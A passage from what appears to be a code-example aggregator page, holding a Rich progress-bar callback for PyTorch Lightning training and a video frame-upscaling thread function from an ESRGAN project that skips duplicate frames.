    def refresh_rate(self) -> int:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "[Validation Sanity Check]"

    @property
    def validation_description(self) -> str:
        return "[Validation]"

    @property
    def test_description(self) -> str:
        return "[Testing]"

    @property
    def predict_description(self) -> str:
        return "[Predicting]"

    def setup(self, trainer, pl_module, stage):
        self.progress = Progress(
            SpinnerColumn(),
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            "[",
            CustomTimeColumn(),
            ProcessingSpeedColumn(),
            MetricsTextColumn(trainer, pl_module, stage),
            "]",
            console=self.console,
            refresh_per_second=self.refresh_rate,
        ).__enter__()

    def on_sanity_check_start(self, trainer, pl_module):
        super().on_sanity_check_start(trainer, pl_module)
        self.val_sanity_progress_bar_id = self.progress.add_task(
            f"[{STYLES['sanity_check']}]{self.sanity_check_description}",
            total=trainer.num_sanity_val_steps,
        )

    def on_sanity_check_end(self, trainer, pl_module):
        super().on_sanity_check_end(trainer, pl_module)
        self.progress.update(self.val_sanity_progress_bar_id, visible=False)

    def on_train_epoch_start(self, trainer, pl_module):
        super().on_train_epoch_start(trainer, pl_module)
        total_train_batches = self.total_train_batches
        self._total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            self._total_val_batches = self._total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + self._total_val_batches

        train_description = self._get_train_description(trainer.current_epoch)

        self.main_progress_bar_id = self.progress.add_task(
            f"[{STYLES['train']}]{train_description}",
            total=total_batches,
        )

    def on_validation_epoch_start(self, trainer, pl_module):
        super().on_validation_epoch_start(trainer, pl_module)
        if self._total_val_batches > 0:
            self.val_progress_bar_id = self.progress.add_task(
                f"[{STYLES['validate']}]{self.validation_description}",
                total=self._total_val_batches,
            )

    def on_validation_epoch_end(self, trainer, pl_module):
        super().on_validation_epoch_end(trainer, pl_module)
        if self.val_progress_bar_id is not None:
            self.progress.update(self.val_progress_bar_id, visible=False)

    def on_test_epoch_start(self, trainer, pl_module):
        super().on_train_epoch_start(trainer, pl_module)
        self.test_progress_bar_id = self.progress.add_task(
            f"[{STYLES['test']}]{self.test_description}",
            total=self.total_test_batches,
        )

    def on_predict_epoch_start(self, trainer, pl_module):
        super().on_predict_epoch_start(trainer, pl_module)
        self.predict_progress_bar_id = self.progress.add_task(
            f"[{STYLES['predict']}]{self.predict_description}",
            total=self.total_predict_batches,
        )

    def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                           dataloader_idx):
        super().on_train_batch_end(trainer, pl_module, outputs, batch,
                                   batch_idx, dataloader_idx)
        if self._should_update(
                self.train_batch_idx,
                self.total_train_batches + self.total_val_batches):
            self.progress.update(self.main_progress_bar_id, advance=1.0)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        super().on_validation_batch_end(trainer, pl_module, outputs, batch,
                                        batch_idx, dataloader_idx)
        if trainer.sanity_checking:
            self.progress.update(self.val_sanity_progress_bar_id, advance=1.0)
        elif self.val_progress_bar_id and self._should_update(
                self.val_batch_idx,
                self.total_train_batches + self.total_val_batches):
            self.progress.update(self.main_progress_bar_id, advance=1.0)
            self.progress.update(self.val_progress_bar_id, advance=1.0)

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        super().on_test_batch_end(trainer, pl_module, outputs, batch,
                                  batch_idx, dataloader_idx)
        if self._should_update(self.test_batch_idx, self.total_test_batches):
            self.progress.update(self.test_progress_bar_id, advance=1.0)

    def on_predict_batch_end(self, trainer, pl_module, outputs, batch,
                             batch_idx, dataloader_idx):
        super().on_predict_batch_end(trainer, pl_module, outputs, batch,
                                     batch_idx, dataloader_idx)
        if self._should_update(self.predict_batch_idx,
                               self.total_predict_batches):
            self.progress.update(self.predict_progress_bar_id, advance=1.0)

    def _should_update(self, current, total) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def _get_train_description(self, current_epoch: int) -> str:
        train_description = f"[Epoch {current_epoch}]"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due of uneven lengths of "Epoch X"
            # and "Validation" Bar description
            num_digits = len(str(current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "
        return train_description

    def teardown(self, trainer, pl_module, stage):
        self.progress.__exit__(None, None, None)
Exemplo n.º 27
0
Arquivo: run.py Projeto: efonte/ESRGAN
def video_thread_func(
    device: torch.device,
    num_lock: int,
    multi_gpu: bool,
    input: Path,
    start_frame: int,
    end_frame: int,
    num_frames: int,
    progress: Progress,
    task_upscaled_id: TaskID,
    ai_upscaled_path: Path,
    fps: int,
    quality: float,
    ffmpeg_params: str,
    deinterpaint: DeinterpaintOptions,
    diff_mode: bool,
    ssim: bool,
    min_ssim: float,
    chunk_size: int,
    padding_size: int,
    scale: int,
    upscale: Upscale,
    config: configparser.ConfigParser,
    scenes_ini: Path,
):
    log = logging.getLogger()
    video_reader: FfmpegFormat.Reader = imageio.get_reader(
        str(input.absolute()))
    start_time = time.process_time()
    last_frame = None
    last_frame_ai = None
    current_frame = None
    frames_diff: List[Optional[FrameDiff]] = []
    video_reader.set_image_index(start_frame - 1)
    start_frame_str = str(start_frame).zfill(len(str(num_frames)))
    end_frame_str = str(end_frame).zfill(len(str(num_frames)))
    task_scene_desc = f'Scene [green]"{start_frame_str}_{end_frame_str}"[/]'
    if multi_gpu and len(upscale.devices) > 1:
        if device.type == "cuda":
            device_name = torch.cuda.get_device_name(device.index)
        else:
            device_name = "CPU"
        task_scene_desc += f" ({device_name})"
    task_scene_id = progress.add_task(
        description=task_scene_desc,
        total=end_frame - start_frame + 1,
        completed=0,
        refresh=True,
    )
    video_writer_params = {"quality": quality, "macro_block_size": None}
    if ffmpeg_params:
        if "-crf" in ffmpeg_params:
            del video_writer_params["quality"]
        video_writer_params["output_params"] = ffmpeg_params.split()
    video_writer: FfmpegFormat.Writer = imageio.get_writer(
        str(
            ai_upscaled_path.joinpath(
                f"{start_frame_str}_{end_frame_str}.mp4").absolute()),
        fps=fps,
        **video_writer_params,
    )
    duplicated_frames = 0
    total_duplicated_frames = 0
    for current_frame_idx in range(start_frame, end_frame + 1):
        frame = video_reader.get_next_data()

        if deinterpaint is not None:
            for i in range(
                    0 if deinterpaint == DeinterpaintOptions.even else 1,
                    frame.shape[0], 2):
                frame[i:i + 1] = (0, 255, 0)  # (B, G, R)

        if not diff_mode:
            if last_frame is not None and are_same_imgs(
                    last_frame, frame, ssim, min_ssim):
                frame_ai = last_frame_ai
                if duplicated_frames == 0:
                    start_duplicated_frame = current_frame_idx - 1
                duplicated_frames += 1
            else:
                frame_ai = upscale.image(frame,
                                         device,
                                         multi_gpu_release_device=False)
                if duplicated_frames != 0:
                    start_duplicated_frame_str = str(
                        start_duplicated_frame).zfill(len(str(num_frames)))
                    current_frame_idx_str = str(current_frame_idx - 1).zfill(
                        len(str(num_frames)))
                    log.info(
                        f"Detected {duplicated_frames} duplicated frame{'' if duplicated_frames==1 else 's'} ({start_duplicated_frame_str}-{current_frame_idx_str})"
                    )
                    total_duplicated_frames += duplicated_frames
                    duplicated_frames = 0
            video_writer.append_data(frame_ai)
            last_frame = frame
            last_frame_ai = frame_ai
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
        else:
            if current_frame is None:
                current_frame = frame
            else:
                frame_diff = get_diff_frame(current_frame, frame, chunk_size,
                                            padding_size, ssim, min_ssim)
                if (
                        frame_diff is None
                ):  # the frame is equal to current_frame, the best scenario!!!
                    frames_diff.append(frame_diff)
                else:
                    h_diff, w_diff, c_diff = frame_diff.frame.shape
                    h, w, c = current_frame.shape
                    if w * h > w_diff * h_diff:  # TODO difference of size > 20%
                        frames_diff.append(frame_diff)
                    else:
                        current_frame_ai = upscale.image(
                            current_frame,
                            device,
                            multi_gpu_release_device=False)
                        video_writer.append_data(current_frame_ai)
                        progress.advance(task_upscaled_id)
                        progress.advance(task_scene_id)
                        current_frame = frame
                        for frame_diff in frames_diff:
                            if frame_diff is None:
                                frame_ai = current_frame_ai
                            else:
                                diff_ai = upscale.image(
                                    frame_diff.frame,
                                    device,
                                    multi_gpu_release_device=False,
                                )
                                frame_diff_ai = frame_diff
                                frame_diff_ai.frame = diff_ai
                                frame_ai = get_frame(
                                    current_frame_ai,
                                    frame_diff_ai,
                                    scale,
                                    chunk_size,
                                    padding_size,
                                )
                            video_writer.append_data(frame_ai)
                            progress.advance(task_upscaled_id)
                            progress.advance(task_scene_id)
                        frames_diff = []
    if diff_mode:
        if len(frames_diff) > 0:
            current_frame_ai = upscale.image(current_frame,
                                             device,
                                             multi_gpu_release_device=False)
            video_writer.append_data(current_frame_ai)
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
            for frame_diff in frames_diff:
                if frame_diff is None:
                    frame_ai = current_frame
                else:
                    diff_ai = upscale.image(frame_diff.frame,
                                            device,
                                            multi_gpu_release_device=False)
                    frame_diff_ai = frame_diff
                    frame_diff_ai.frame = diff_ai
                    frame_ai = get_frame(
                        current_frame_ai,
                        frame_diff_ai,
                        scale,
                        chunk_size,
                        padding_size,
                    )
                video_writer.append_data(frame_ai)
                progress.advance(task_upscaled_id)
                progress.advance(task_scene_id)
            current_frame = None
            frames_diff = []
        elif current_frame is not None:
            current_frame_ai = upscale.image(current_frame,
                                             device,
                                             multi_gpu_release_device=False)
            video_writer.append_data(current_frame_ai)
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
    if duplicated_frames != 0:
        start_duplicated_frame_str = str(start_duplicated_frame).zfill(
            len(str(num_frames)))
        current_frame_idx_str = str(current_frame_idx - 1).zfill(
            len(str(num_frames)))
        log.info(
            f"Detected {duplicated_frames} duplicated frame{'' if duplicated_frames==1 else 's'} ({start_duplicated_frame_str}-{current_frame_idx_str})"
        )
        total_duplicated_frames += duplicated_frames
        duplicated_frames = 0

    video_writer.close()
    task_scene = next(task for task in progress.tasks
                      if task.id == task_scene_id)

    config.set(f"{start_frame_str}_{end_frame_str}", "upscaled", "True")
    config.set(
        f"{start_frame_str}_{end_frame_str}",
        "duplicated_frames",
        f"{total_duplicated_frames}",
    )
    finished_speed = task_scene.finished_speed or task_scene.speed or 0.01
    config.set(
        f"{start_frame_str}_{end_frame_str}",
        "average_fps",
        f"{finished_speed:.2f}",
    )
    with open(scenes_ini, "w") as configfile:
        config.write(configfile)
    log.info(
        f"Frames from {str(start_frame).zfill(len(str(num_frames)))} to {str(end_frame).zfill(len(str(num_frames)))} upscaled in {precisedelta(dt.timedelta(seconds=time.process_time() - start_time))}"
    )
    if total_duplicated_frames > 0:
        total_frames = end_frame - (start_frame - 1)
        seconds_saved = (((1 / finished_speed * total_frames) - (
            total_duplicated_frames * 0.04)  # 0.04 seconds per duplicate frame
                          ) / (total_frames - total_duplicated_frames) *
                         total_duplicated_frames)
        log.info(
            f"Total number of duplicated frames from {str(start_frame).zfill(len(str(num_frames)))} to {str(end_frame).zfill(len(str(num_frames)))}: {total_duplicated_frames} (saved ≈ {precisedelta(dt.timedelta(seconds=seconds_saved))})"
        )
    progress.remove_task(task_scene_id)
    if multi_gpu:
        upscale.devices[device][num_lock].release()